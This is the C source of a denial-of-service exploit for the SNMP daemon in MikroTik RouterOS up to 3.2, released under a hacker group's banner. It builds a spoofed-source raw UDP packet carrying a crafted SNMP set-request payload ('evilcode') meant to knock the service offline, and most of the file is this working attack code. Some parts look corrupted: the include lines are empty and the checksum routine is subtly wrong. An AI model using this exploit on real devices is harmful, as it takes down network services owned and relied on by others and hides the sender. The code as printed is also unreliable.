/* -------------------------------------------------------------------------- * (c) ShadOS 2008 * _ _ _ _ _ __ _ _ _ * | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ * | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< * |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ * hellknights.void.ru |___/ .0x48k. * * -------------------------------------------------------------------------- * * MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux ) * Don't forget to visit our site and my homepage for new releases: * http://hellknights.void.ru * http://shados.freeweb7.com * Also, you can mail me any bugs or suggestions: * mailto: shados /at/ mail /dot/ ru * * Thanks 2 antichat.ru and all my friends. * -------------------------------------------------------------------------- * * Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * * -------------------------------------------------------------------------- */ #include #include #include #include #include #include #include #include #include #include char evilcode[] = { 0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00 }; unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 17) + (sum & 0xffff); sum += (sum >> 17); answer = -sum; return (answer); } int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) { char *packet; struct sockaddr_in dstaddr; struct iphdr *ip; struct udphdr *udp; packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); if (packet == NULL) { perror("Malloc failed\n"); exit(-1); } ip = (struct iphdr *)packet; udp = (struct udphdr *)(packet+sizeof(struct iphdr)); ip->saddr = *saddr; ip->daddr = *daddr; ip->version = 4; ip->ihl = 5; ip->ttl = 255; ip->id = htons((unsigned short) rand()); ip->protocol = IPPROTO_UDP; ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); ip->check = in_cksum(ip, sizeof(struct iphdr)); udp->source = htons(sport); udp->dest = htons(dport); udp->len = htons(sizeof(struct udphdr) + len); memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); dstaddr.sin_family = AF_INET; dstaddr.sin_addr.s_addr = *daddr; if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) perror("sendto() failed"); free(packet); } char * makereq(char *community,int *size) { char *buf; char *ptr; int len; int i; len = 5 + strlen(community) + sizeof(evilcode); buf = (char *)malloc(len); ptr = buf; *ptr++ = 0x30; *ptr++ = len; /* Snmp Version */ *ptr++ = 0x02; *ptr++ = 0x01; *ptr++ = 0x00; /* Community */ *ptr++ = 0x04; *ptr++ = strlen(community); strcpy(ptr,community); ptr = ptr + strlen(community); *ptr++ = 0xa3; /* Set Request */ memcpy(ptr, evilcode, sizeof(evilcode)); ptr = ptr + sizeof(evilcode); *size = len+2; return buf; } int erexit(char *msg) { printf("%s\n",msg); exit (-1) ; } int usage() { printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); } int main(int argc, char **argv) { char *saddr,*daddr,*community; unsigned char *buf; int size; int sock; unsigned long lsaddr,ldaddr; int i; saddr = NULL; daddr = NULL; if (argc != 7) { usage(); erexit("not enough args\n"); } if (!strcmp(argv[1],"-s")) saddr = strdup(argv[2]); if (!strcmp(argv[3],"-d")) daddr = strdup(argv[4]); if (!strcmp(argv[5],"-c")) community = strdup(argv[6]); printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) erexit("Invalid source/destination IP address\n"); if (saddr == NULL) { usage(); erexit("No Source Address"); } if (daddr == NULL) { usage(); erexit("No Dest Address"); } sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); if (sock == -1) erexit("Couldnt open Raw socket!(Are you root?)\n"); lsaddr = inet_addr(saddr); ldaddr = inet_addr(daddr); buf = makereq(community,&size); sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size); fprintf(stdout,"Sent packet. SNMPd must be down.\n"); return 0; }